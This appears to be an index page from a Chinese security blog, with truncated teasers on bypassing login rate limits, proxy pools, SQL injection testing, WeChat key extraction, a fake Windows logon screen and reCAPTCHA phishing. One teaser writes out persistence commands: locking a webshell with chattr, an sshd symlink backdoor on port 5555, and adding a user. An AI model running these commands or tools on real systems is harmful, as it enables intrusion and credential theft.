buro暴力破解保护失效绕过IP 封锁之登录次数限制

ProxyPoolxSocks Socks代理池服务端自动化搭建工具 Github项目： https://github.com/xsxtw/ProxyPoolxSocks 声明：本工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈...

xia SQL (瞎注) 本插件仅只插入单引号，没有其他盲注啥的，而且结果返回的结果需要人工介入去判断是否存在注入，如果需要所有注入都测试，请把burp的流量转发到xray。 burp 插件。 在每个参数后...

微信聊天记录提取 https://github.com/AdminTest0/SharpWxDump 版本 < 3.7.0.30 只运行不登录能获取个人信息，登录后可以获取数据库密钥 版本 > 3.7.0.30 只运行不登录不能获取个人信息，登...

文件上锁 chattr +i webshell.php lsattr webshell.php chattr -i webshell.php ssh 软链接 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555; useradd test -p test 不死马 访问该 php 文...

前言 遇到一个站，后端是Node.js写的，对于这种类型的站点，一般比较难getshell，但也实现了最终的目标，拿到后台权限 信息搜集 先进行常规的信息搜集，子域名扫描、端口扫描、目录扫描等 这个...

FakeLogonScreen是一个伪造Windows登录屏幕以获取用户密码的实用程序。输入的密码将根据Active Directory或本地计算机进行验证，以确保其正确，然后显示到控制台或保存到磁盘。 它可以通过简单...

recaptcha phish 使用虚假reCAPTCHA进行网络钓鱼

山乃柠檬

先看一个例子 本地测试环境：PHP 5.4.45 + Win <?php     $command = 'dir '.$_POST['dir'];     $escaped_command = escapeshellcmd($command);     var_dump($escap...